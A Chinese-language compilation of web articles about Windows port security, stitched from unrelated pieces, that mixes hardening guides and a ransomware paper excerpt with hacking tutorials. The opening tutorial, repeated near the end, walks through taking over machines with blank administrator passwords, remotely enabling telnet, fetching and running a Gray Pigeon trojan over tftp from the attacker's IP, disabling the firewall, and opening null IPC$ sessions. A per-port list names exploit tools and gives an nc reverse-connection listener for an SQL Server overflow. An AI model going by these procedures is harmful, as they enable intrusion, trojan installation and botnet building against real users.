利用135端口和445端口入侵
135端口入侵:
准备工具:S扫描器,NTScan,Recton,tftpd32,木马一个(我用的是灰鹆子..下面的""就是生成的)
入侵步骤:
1.用S扫描器扫段135端口的IP,扫完之后保存下来(只保留那些IP就好.)
2.然后用NTScan 扫下空口令(线程随便你填..点"WMI扫描"再把下面的"139"改为"135"),如果有空口令的话在下面会显示的
3.打开Recton,选择第二个(也就是Telnet的那个,然后在"远程主机"那里扫你刚刚扫出空口令的IP,直接点个【开始执行】就可以了(成功的话基本上是显示→
连接成功!
正在检查Telnet服务状态......
正在改变服务状态......
正在设置NTLM=0 ......
正在设置端口=23 ......
Telnet服务已经成功打开!端口:23 .)
4.打开tftp32这个文件,把你的木马跟文件放在同一个目录里..弄好之后接着看下面:
5.开始---运行--telnet IP,进入之后如果有:
您将要把您的密码信息送到Internet 区内的一台远程计算机上。这可能不安全。您还要送吗(y/n):
如果有这样的话就选N..回车...
login:
password:
login:后填administrator,下面个是密码,不用填,直接回车就行...)
然后就进了他的C盘了(一般的话)..如果没在C盘的话键入CD,这个命令就回到C盘的,然后你再键入这段命令:tftp -i ***.***.***.*** get
分析下:tftp是文件
-i是指定的命令格式
***.***.***.***这个是你自己的IP(记住.是自己外网的IP)
get指定的命令格式
这是我是自己的木马(也就是刚才说到要跟tftp放在同一个目录下的木马.名字可以自己改.方便就好)..
然后上传成功的话就运行木马就行了..然后就等着鹆子上线吧哈...445端口入侵
用到的工具:
一.扫描器二.NTscan汉化版三.灰鸽子木马四.阿D网络工具包
1.我们扫445端口,由于445端口受到网络的限制,我们只能扫本市的,不过大家可以到肉鸡上扫,呵呵,那可是肉鸡生肉鸡啊
扫完后,整理一下
汉化版扫描弱口令,用WMI格式扫,
3.用啊D,找开远程开共享,然后传马.OK进去了,想开哪个盘就开哪个盘,下来就是开本地的cmd传马了
相关命令:
net share 查看它有没有开共享
net stop sharedaccess 关防火墙
net share d$=d: D盘共享开启
copy \\传木马到肉鸡的D盘里
net share d$ /del 把D盘共享删掉
net use \\ip\ipc$ "" /user:""与某个IP建空连接
昨天朋友说,发生系统错误,是怎么回事。下面我说说:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,登录失败:未知的用户名或错误密码。"在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为guest连接,是无法访问C$等管理共享的.
错误号1327,登陆失败:用户帐户限制。可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS。
各个端口的入侵方法(入侵菜鸟必看)
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(小榕的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
====================================== 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
常用的端口入侵
21端口: 21端口是默认的FTP端口,利用方式:弱口令探测/溢出 目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个漏洞。 22端口 22端口是SSH远程登录协议,利用方式:弱口令探测 23端口 23端口是TLENET的默认端口,利用方式:弱口令探测/溢出 一般大家用弱口令探测得比较多,但是成功率比较低,还是溢出来得快,毕竟权限高,想做什么都可以! 25端口 25端口是SMTP协议的默认端口,邮件接收服务器。利用方式:溢出 53端口 53端口是DNS服务的默认端口,提供域名服务器, 利用方式:溢出。这个今年很火,我试了一下,一晚上差不多可以溢出10W台开几抬肉鸡的话 79端口 79端口Finger服务的默认端口(查询远程主机在线用户等信息),可以在辅助入侵中获取更多的主机信息。利用FINGER服务可以查询到主机很多敏感的信息,在入侵的时候常常可以起到意想不到的作用。
80端口 80端口是IIS的默认端口,全球信息网超文本传输协议(www)。利用方式:IIS溢出/SQL注入/旁注/跨站。不过一部分路由器的远程管理端口也是80。SQL注入大家已经很熟悉了吧,IIS溢出也只存在那些很老的机器上,看运气了。 110端口 110端口提供 Pop3 服务。邮件发送服务器。利用方式:溢出。 135端口 135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。 网上教程非常多,不多说了。 137端口 137端口统共NetBIOS 数据报(UDP)服务。 139端口 139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。 161端口 161端口是远程管理设备(SNMP)的默认端口。这个很多小菜不知道怎么利用,那么重点来说说这个。 SNMP是简单网络管理协议,不清楚百度一下,很多小菜扫描出来了SNMP的弱口令,比如private,public等等,但是不知道怎么利用,这里介绍两款工具:IP NetWork browse 和LANguard NetWork Scnaner,这两个工具都可以扫描SNMP,而且可以扫描到,磁盘,服务,
屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧
屏蔽135 139 445 3389端口的方法以及网络端口安全防护技巧 默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和UDP 135、137、138、445 端口,一些流行病毒的后门端口(如TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口: 第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建IP 安全策略”(如右图),于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。 第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。 第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何IP 地址”,目标地址选“我的IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输
关于135端口实战入侵&安全防御
无论是高手还是菜鸟,大家都知道常见的高危端口:135,139,3389,445等。大家唯恐不能快点关闭这些端口以及相应的服务来保证系统的安全。其实本人认为这是错误的,黑客技术是建立在攻与防之间的,下面看本人的135实战原理分析,以及135端口的安全防御! 一,工具攻防 现在在网上,有很多的135抓鸡器,都是全自动的,利用135端口往往能抓很多肉鸡,为什么呢?因为正版系统为了性能都是开启这些高危服务的,而用户是新手或者安全意识不强的话,就不会关闭这些东西,他们也不懂这些,所以就被抓了。我们从工具的抓鸡过程来分析! 图一 这是一款典型的135抓鸡器,下面我们来分析一下抓鸡的过程,从攻击的方面来防御!首先扫描,筛选开启135端口的机器,这些都是很普通的。下面开始扫描弱口令了,从反面的角度来说,135端口入侵需要弱口令(弱口令就是保护强度很弱的密码,比如123)。接着看溢出,溢出是利用下载马的形式。 实战: 1,扫描135端口,然后筛选出弱口令等。 2,启动ftp或者是tftp本地服务器,开启服务,将木马设置放进目录 3,按照步骤批量溢出,在此填入你的电脑,以及改变相应的设置
图二 防御在下面的文章说。 二手动入侵 手动入侵是最爽的了,用工具不如手工的灵活。这样我们就要详细分析下135端口了!我们打开管理,查看服务。 图三 众所周知,135端口的服务是RPC。看RPC的说明,似乎毫无头绪,是的根本看不明白。下面就说下使用的方法。 在这里,入侵的常见步骤是: 1,确定目标 2,扫描端口,假设开启了135端口
3,开启需要的漏洞服务,比如IPC共享或者telnet 我们开始实战! 通过上面的描述,作为终结点映射程序和com服务控制管理器使用。意思就是远程控制电脑的服务。那这样,我们就连接到远程电脑的服务控制台。打开服务管理器,在上面点击操作,点击连接到另一台电脑。 图四 图五 图六
关闭135、137、138、445端口
关闭135/137/138/445端口 安装的是Windows 2000 Server,还是Windows Server 2003,它们无一例外会在默认安装下开通135端口、137端口、138端口、139端口和445端口。这些端口可以说都是一把“双刃剑”,它们既能为你提供便利,也会反过来,被其他人非法利用,成为你心中永远的痛。为此,我们很有必要熟悉这些端口,弄清它们的作用,找出它们的“命门”,以避免误伤了自己。 135端口 在许多“网管”眼里,135端口是最让人捉摸不透的端口,因为他们中的大多数都无法明确地了解到135端口的真正作用,也不清楚该端口到底会有哪些潜在的危险。直到一种名为“IEen”的专业远程控制工具出现,人们才清楚135端口究竟会有什么样的潜在安全威胁。 IEen工具能够借助135端口轻松连接到Internet上的其他工作站,并远程控制该工作站的IE浏览器。例如,在浏览器中执行的任何操作,包括浏览页面内容、输入帐号密码、输入搜索关键字等,都会被IEen工具监控到。甚至在网上银行中输入的各种密码信息,都能被IEen工具清楚地获得。除了可以对远程工作站上的IE浏览器进行操作、控制外,IEen工具通过135端口几乎可以对所有的借助DCOM开发技术设计出来的应用程序进行远程控制,例如IEen工具也能轻松进入到正在运行Excel的计算机中,直接对Excel进行各种编辑操作。 怎么样?135端口对外开放是不是很危险呀?当然,这种危险毕竟是理论上的,要想真正地通过135端口入侵其他系统,还必须提前知道对方计算机的IP地址、系统登录名和密码等。只要你严格保密好这些信息,你的计算机被IEen工具攻击的可能性几乎不存在。 为什么IEen工具能利用135端口攻击其他计算机呢?原来该工具采用了一种DCOM技术,可以直接对其他工作站的DCOM程序进行远程控制。DCOM技术与对方计算机进行通信时,会自动调用目标主机中的RPC服务,而RPC服务将自动询问目标主机中的135端口,当前有哪些端口可以被用来通信。如此一来,目标主机就会提供一个可用的服务端口作为数据传输通道使用。在这一通信过程中,135端口的作用其实就是为RPC通信提供一种服务端口的映射功能。说简单一点,135端口就是RPC通信中的桥梁。 137端口 137端口的主要作用是在局域网中提供计算机的名字或IP地址查询服务,一般安装了NetBIOS协议后,该端口会自动处于开放状态。 要是非法入侵者知道目标主机的IP地址,并向该地址的137端口发送一个连接请求时,就可能获得目标主机的相关名称信息。例如目标主机的计算机名称,注册该目标主机的用户信息,目标主机本次开机、关机时间等。此外非法入侵者还能知道目标主机是否是作为文件服务器或主域控制器来使用。 138端口 137、138端口都属于UDP端口,它们在局域网中相互传输文件信息时,就会发生作用。而138端口的主要作用就是提供NetBIOS环境下的计算机名浏览功能。 非法入侵者要是与目标主机的138端口建立连接请求的话,就能轻松获得目标主机所处的局域网网络名称以及目标主机的计算机名称。有了计算机名称,其对应的IP地址也就能轻松获得。如此一来,就为黑客进一步攻击系统带来了便利。 139端口 139端口是一种TCP端口,该端口在你通过网上邻居访问局域网中的共享文件或共享打印机时就能发挥作用。 139端口一旦被Internet上的某个攻击者利用的话,就能成为一个危害极大的安全漏洞。因为黑客要是与目标主机的139端口建立连接的话,就很有可能浏览到指定网段内所有工作站中的全部共享信息,甚至可以对目标主机中的共享文件夹进行各种编辑、删除操作,倘若攻击者还知道目标主机的IP地址和登录帐号的话,还能轻而易举地查看到目标主机中的隐藏共享信息。 445端口 445端口也是一种TCP端口,该端口在Windows 2000 Server或Windows Server 2003系统中发挥的作用
135端口
135端口:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务。 端口说明:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。 端口漏洞:相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒,该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。 操作建议:为了避免“冲击波”病毒的攻击,建议关闭该端口。 137端口:137端口主要用于“NetBIOS Name Service”(NetBIOS名称服务)。 端口说明:137端口主要用于“NetBIOS Name Service”(NetBIOS名称服务),属于UDP端口,使用者只需要向局域网或互联网上的某台计算机的137端口发送一个请求,就可以获取该计算机的名称、注册用户名,以及是否安装主域控制器、IIS是否正在运行等信息。 端口漏洞:因为是UDP端口,对于攻击者来说,通过发送请求很容易就获取目标计算机的相关信息,有些信息是直接可以被利用,并分析漏洞的,比如IIS服务。另外,通过捕获正在利用137端口进行通信的信息包,还可能得到目标计算机的启动和关闭的时间,这样就可以利用专门的工具来攻击。 操作建议:建议关闭该端口。 139端口:139端口是为“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。 端口说明:139端口是为“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。在Windows中要在局域网中进行文件的共享,必须使用该服务。比如在Windows 98中,可以打开“控制面板”,双击“网络”图标,在“配置”选项卡中单击“文件及打印共享”按钮选中相应的设置就可以安装启用该服务;在Windows 2000/XP中,可以打开“控制面板”,双击“网络连接”图标,打开本地连接属性;接着,在属性窗口的“常规”选项卡中选择“Internet协议(TCP/IP)”,单击“属性”按钮;然后在打开的窗口中,单击“高级”按钮;在“高级TCP/IP设置”窗口中选择“WINS”选项卡,在“NetBIOS设置”区域中启用TCP/IP上的NetBIOS。 端口漏洞:开启139端口虽然可以提供共享服务,但是常常被攻击者所利用进行攻击,比如使用流光、SuperScan等端口扫描工具,可以扫描目标计算机的139端口,如果发现有漏洞,可以试图获取用户名和密码,这是非常危险的。 操作建议:如果不需要提供文件和打印机共享,建议关闭该端口。 143端口:143端口主要是用于“Internet Message Access Protocol”v2(Internet消息访问协议,简称IMAP)。 端口说明:143端口主要是用于“Internet Message Access Protocol”v2(Internet消息访问协议,简称IMAP),和POP3一样,是用于电子邮件的接收的协议。通过IMAP协议我们可以在不接收邮件的情况下,知道信件的内容,方便管理服务器中的电子邮件。不过,相对于POP3协议要负责一些。如今,大部分主流的电子邮件客户端软件都支持该协议。 端口漏洞:同POP3协议的110端口一样,IMAP使用的143端口也存在缓冲区溢出漏洞,通过该漏洞可以获取用户名和密码。另外,还有一种名为“admv0rm”的Linux蠕虫病毒会利用该端口进行繁殖。 操作建议:如果不是使用IMAP服务器操作,应该将该端口关闭。 161端口:161端口是用于“Simple Network Management Protocol”(简单网络管理协议,简称SNMP)。 端口说明:161端口是用于“Simple Network Management Protocol”(简单网络管理协议,简称SNMP),
病毒445攻击端口说明
关于端口关闭后带来不便及影响 1: 445端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也 正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会 在悄无声息中将你的硬盘格式化掉! 2: 135端口就是用于远程的打开对方的telnet服务,用于启动与远程计算机的 RPC 连接,很容易就可以就侵入电脑。大名鼎鼎的“冲击波”就是利用135端口侵入的。 135的作用就 是进行远程,可以在被远程的电脑中写入恶意代码,危险极大。 3: 136端口命名系统 4: 137端口的主要作用是在局域网中提供计算机的名字或IP地址查询服务,一般安装了NetBIOS协议后,该端口会自动处于开放状态。 要是非法入侵者知道目标主机的IP地址,并向该地址的137端口发送一个连接请求时, 就可能获得目标主机的相关名称信息。例如目标主机的计算机名称,注册该目标主机的用 户信息,目标主机本次开机、关机时间等。此外非法入侵者还能知道目标主机是否是作为 文件服务器或主域控制器来使用。 5: 137、138端口都属于UDP端口,它们在局域网中相互传输文件信息时,就会发生作用。而138端口的主要作用就是提供NetBIOS环境下的计算机名浏览功能。非法入侵者 要是与目标主机的138端口建立连接请求的话,就能轻松获得目标主机所处的局域网网络名称以及目标主机的计算机名称。有了计算机名称,其对应的IP地址也就能轻松获得。如此一来,就为黑客进一步攻击系统带来了便利。 6: 139端口是一种TCP端口,该端口在你通过网上邻居访问局域网中的共享文件或共享 打印机时就能发挥作用。139端口一旦被Internet上的某个攻击者利用的话,就能成为一 个危害极大的安全漏洞。因为黑客要是与目标主机的139端口建立连接的话,就很有可能浏览到指定网段内所有工作站中的全部共享信息,甚至可以对目标主机中的共享文件夹进 行各种编辑、删除*作,倘若攻击者还知道目标主机的IP地址和登录帐号的话,还能轻而 易举地查看到目标主机中的隐藏共享信息。 关闭端口后造成影响: 关闭139和445端口会对文件共享以及共享打印造成无法连接。 关闭135端口后会关闭RPC远程连接服务,对不需要的用户来说无影响。 关闭136端口无影响。 关闭137/138端口会影响局域网互传文件,如不需要也可关闭。
445端口入侵
445端口入侵 1. 简介 445端口是Windows操作系统中的一个常用端口,用于进行SMB(Server Message Block)协议通信。然而,由于该端口的常开性和漏洞的存在,黑客常常利用445端口进行入侵攻击。 本文将分析445端口入侵的过程和防范措施,以帮助用户提高系统安全性。 2. 445端口入侵的过程 2.1 扫描445端口 黑客通常使用扫描工具,如Nmap,对目标主机的445端口进行扫描,以确定该端口是否开放。 2.2 使用漏洞利用工具 一旦找到开放的445端口,黑客将利用已知的漏洞来获取对目标主机的控制权。例如,MS17-010漏洞是一种常见的利
用SMB服务的漏洞,黑客可以通过利用该漏洞来执行远程代码。 2.3 密码破解 如果445端口开放的主机存在弱密码或默认密码,黑客可 以使用密码破解工具进行暴力破解,以获取对主机的访问权限。 2.4 远程命令执行 在获得对目标主机的访问权限后,黑客可以通过执行远程 命令在目标主机上执行各种恶意活动,如文件传输、系统控制等。 3. 防范措施 为了保护系统免受445端口入侵的威胁,用户可以采取以 下防范措施: 3.1 更新系统补丁 及时更新操作系统和相关软件的安全补丁,以修复已知的 漏洞,减少黑客利用的机会。
3.2 配置防火墙规则 通过配置防火墙,限制对445端口的访问,仅允许受信任 的IP地址或网络进行访问。这可以帮助阻止未经授权的访问。 3.3 使用强密码 确保在445端口开放的主机上使用强密码,并定期更改密码。强密码应包含大小写字母、数字和特殊字符,并具有足够的长度。 3.4 禁用不必要的服务 在系统中禁用不必要的服务和功能,减少攻击面。当不需 要使用445端口时,可以考虑禁用SMB服务。 3.5 监控网络活动 定期监控网络活动,并使用入侵检测系统(IDS)或入侵防御系统(IPS)等工具来检测和阻止可疑的访问尝试。
TCP和UDP的135、137、138、139、445端口的作用
TCP和UDP的135、137、138、139、445端口的作用 爱学习de小乌龟2019-07-17 17:04:10 如果全是2000以上的系统,可以关闭137.138.139,只保留445 如果有xp系统,可能以上四个端口全部要打开 无论你的服务器中安装的是Windows 2000 Server,还是Windows Server 2003,它们无一例外会在默认安装下开通135端口、137端口、138端口、139端口和445端口。这些端口可以说都是一把“双刃剑”,它们既能为你提供便利,也会反过来,被其他人非法利用,成为你心中永远的痛。为此,我们很有必要熟悉这些端口,弄清它们的作用,找出它们的“命门”,以避免误伤了自己。 135端口
在许多“网管”眼里,135端口是最让人捉摸不透的端口,因为他们中的大多数都无法明确地了解到135端口的真正作用,也不清楚该端口到底会有哪些潜在的危险。直到一种名为“IEen”的专业远程控制工具出现,人们才清楚135端口究竟会有什么样的潜在安全威胁。 IEen工具能够借助135端口轻松连接到Internet上的其他工作站,并远程控制该工作站的IE浏览器。例如,在浏览器中执行的任何操作,包括浏览页面内容、输入帐号密码、输入搜索关键字等,都会被IEen工具监控到。甚至在网上银行中输入的各种密码信息,都能被IEen工具清楚地获得。除了可以对远程工作站上的IE浏览器进行*作、控制外,IEen工具通过135端口几乎可以对所有的借助DCOM开发技术设计出来的应用程序进行远程控制,例如IEen工具也能轻松进入到正在运行Excel的计算机中,直接对Excel进行各种编辑*作。 怎么样?135端口对外开放是不是很危险呀?当然,这种危险毕竟是理论上的,要想真正地通过135端口入侵其他系统,还必须提前知道对方计算机的IP地址、系统登录名和密码等。只要你严格保密好这些信息,你的计算机被IEen工具攻击的可能性几乎不存在。 为什么IEen工具能利用135端口攻击其他计算机呢?原来该工具采用了一种DCOM技术,可以直接对其他工作站的DCOM程序进行远程控制。DCOM技术与对方计算机进行通信时,会自动调用目标主机中的RPC服务,而RPC服务将自动询问目标主机中的135端口,当前有哪些端口可以被用来通信。如此一来,目标主机就会提供一个可用的服务端口作为数据传输通道使用。在这一通信过程中,135端口的作用其实就是为RPC通信提供一种服务端口的映射功能。说简单一点,135端口就是RPC通信中的桥梁。 137端口 137端口的主要作用是在局域网中提供计算机的名字或IP地址查询服务,一般安装了NetBIOS协议后,该端口会自动处于开放状态。 要是非法入侵者知道目标主机的IP地址,并向该地址的137端口发送一个连接请求时,就可能获得目标主机的相关名称信息。例如目标主机的计算机名称,注册该目标主机的用户信息,目标主机本次开机、关机时间等。此外非法入侵者还能知道目标主机是否是作为文件服务器或主域控制器来使用。
计算机网络安全与勒索病毒应对策略
计算机网络安全与勒索病毒应对策略 作者:蔡琴 来源:《无线互联科技》2022年第12期 摘要:云计算数据平台虽然为用户提供了大量数据信息,但当数据安全性受到威胁时,将会带来很大的损失。文章介绍了勒索病毒“WannaCry”的传播特点、传播方式和危害性,分析了它的攻击方式和流程,探讨了数据平台的防护方法及安全措施。通过增强整体计算机网络防护体系,并加强内网的防护安全,避免病毒感染和攻击,最终维护好数据安全。 关键词:云计算;勒索病毒;计算机安全;系统防护 0引言 云计算数据平台虽然为用户提供了更多数据资源,但在黑客攻击时,将会带来严重后果。云计算环境的数据平台有数据容量大、数据类型多、数据价值密度低的特点,数据保密和安全尤为重要[1]。现有的数据安全识别技术还无法抵挡黑客的攻击,用户安全意识低,无意间浏览非法网站、钓鱼网站,这些都给计算机安全防护工作带来困难。计算机网络系统的漏洞,给别有用心的黑客带来可乘之机,最终使计算机安全得不到相应的保障。在大数据时代,如果数据一旦受到病毒攻击,用户的数据会被窃取,破坏正常的网络环境。计算机管理者需要建立有效的防御机制,做好安全保障工作,避免造成严重的网络安全事件。 1云计算数据平台的病毒防护 历史上出现的一次次病毒攻击,说明了防御病毒之路任重而道远。安全防护体系的建立非常关键,病毒的防范三分靠技术,七分靠管理[2]。
1.1建立必要的黑客防御机制 黑客攻击属于人为操作、恶意攻击,是以获利或危害社会为目的的网络安全问题。对社会危害较大,黑客掌握较高计算机技术,有很强的操作能力,还能洞悉操作系统的各种安全漏洞,令人防不胜防。所以,需要建立黑客防御机制,解析黑客攻击的技术要点,对黑客的入侵方式和入侵企图进行分析,提高反入侵对抗的技术,找出黑客入侵时系统的安全问题,只有对黑客攻击技术达到一个新的认识,才能构建一个对系统有力保障的防护体系。 1.2加强对用户网络安全培训 为了尽可能地避免计算机网络安全问题,加强对用户的网络安全意识的宣传,提高用户的安全防范能力,引导用户定时修补系统漏洞、定期查杀。提高专业技术人员网络行为规范,有效解决用户的技术困扰,减少因使用不当造成的系统隐患,避免系统受到攻击,为整个计算机网络体系统提供安全保障。 1.3加强系统的监管和提高病毒防范机制 加强系统的监管和网络安全防范力度,根据病毒的特点和传播方式来建立病毒预警机制,引入入侵检测管理技术,加强数据入侵管理,进行数据流量监测,经常对关键信息进行数据分析和收集,如果出现非法操作,立即用合理手段进行干预。在病毒防范过程中,技术人员也要严格根据安全管理模式进行日常操作和管理,及时更新病毒特征库,建立完整的计算机网络杀毒系统。 2勒索病毒的传播特点 勒索病毒是一种新型电脑病毒,是病毒程序和勒索程序相结合的结果。主要采取网络钓鱼、垃圾邮件、恶意软件植入、恶意捆绑正常软件、移动存储介质、内网摆渡等形式在网络上进行传播。网络用户在访问这些网页时,下载了被伪装成正常程序的病毒,在系统里安装,传播方式狡猾且隐蔽,先感染服务器,然后通过共享方式在局域网里继续传播,可以导致170多种扩展名文件都被加密,加密算法不易破解,受害者不能再进入系统,只能通过暗网链接付费后,拿到破解密钥才能恢复重要文件,性质恶劣,给用户带来了严重的后果和损失。 2.1勒索病毒隐蔽性更强 勒索病毒隐蔽于第三方应用,利用用户对第三方应用服务的完全信任,传播病毒。病毒隐蔽于微信、QQ、电子邮件、HTML页面等,借助比特币电子货币、洋葱网络等匿名通信技术劫持受害者。病毒以程序代码或隐含文件的形式存于程序中,只有经过程序代碼分析,对代码字节一一分析才能检查出来。
通过批处理关闭135137445等端口的实现代码
通过批处理关闭135 137 445等端口的实现代码 电脑病毒看不见,却无处不在,有时防护措施不够或者不当操作都会导致病毒入侵。这篇文章主要介绍了通过批处理关闭135 137 445等端口的实现代码,需要的朋友可以参考下 主要是通过bat操作防火墙添加规则,一般是tcp与udp。 方法 请将以下代码存为关闭端口.bat ,以管理员身份运行就可以了,运行前记得打开防火墙双击使用。 %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe ","/c %~s0 ::","","runas",1)(window.close)&&exit @echo off color 1f title 关闭135 137 138 139 445 端口 echo. echo. echo. echo 正在关闭135端口请稍候… netsh advfirewall firewall add rule name = "Disable port 135 - TCP" dir = in action = block protocol = TCP localport = 135 echo. netsh advfirewall firewall add rule name = "Disable port 135 - UDP" dir = in action = block protocol = UDP localport = 135 echo. echo 正在关闭137端口请稍候… netsh advfirewall firewall add rule name = "Disable port 137 - TCP" dir = in action = block protocol = TCP localport = 137 echo. netsh advfirewall firewall add rule name = "Disable port 137
利用135端口和445端口入侵
135 端口入侵: 准备工具:S扫描器,NTScan Recton, tftpd32,木马一个(我用的是灰鹆子.. 下面的"" 就是生成的) 入侵步骤: 1.用S扫描器扫段135端口的IP,扫完之后保存下来(只保留那些IP就好.) 2•然后用NTScan扫下空口令(线程随便你填••点"WMI扫描"再把下面的"139"改为"135"),如果有空口令的话在下面会显示的 3•打开Recto n,选择第二个(也就是Tel net的那个,然后在"远程主机"那里扫你刚刚扫出空口令的IP,直接点个【开始执行】就可以了(成功的话基本上是显示f 连接成功! 正在检查Telnet服务状态........... 正在改变服务状态......... 正在设置NTLM=0 .......... 正在设置端口=23 .......... Tel net服务已经成功打开!端口:23 .) 4.打开tftp32 这个文件,把你的木马跟文件放在同一个目录里..弄好之后接 着看下面: 5•开始---运行--telnet IP,进入之后如果有: 您将要把您的密码信息送到Internet 区内的一台远程计算机上。这可能不安全。您还要送吗(y/n): 如果有这样的话就选N..回车... login:
password: login: 后填administrator ,下面个是密码,不用填,直接回车就行...) 然后就进了他的C盘了(一般的话)..如果没在C盘的话键入CD,这个命令就回到C 盘的,然后你再键入这段命令:tftp -i ************ get 分析下:tftp 是文件 -i 是指定的命令格式 ************ 这个是你自己的IP(记住.是自己外网的IP) get 指定的命令格式 这是我是自己的木马(也就是刚才说到要跟tftp 放在同一个目录下的木马.名字可以自己改.方便就好).. 然后上传成功的话就运行木马就行了..然后就等着鹆子上线吧哈...445 端口入侵 用到的工具: 一扫描器二.NTscan汉化版三.灰鸽子木马四.阿D网络工具包 1.我们扫445端口,由于445 端口受到网络的限制,我们只能扫本市的,不过大家可以到肉鸡上扫,呵呵,那可是肉鸡生肉鸡啊 扫完后,整理一下 汉化版扫描弱口令,用WMI 格式扫, 3•用啊D,找开远程开共享,然后传马.0K进去了,想开哪个盘就开哪个盘,下来就是开本地的cmd 传马了 相关命令: net share 查看它有没有开共享 net stop sharedaccess 关防火墙
勒索病毒防范措施
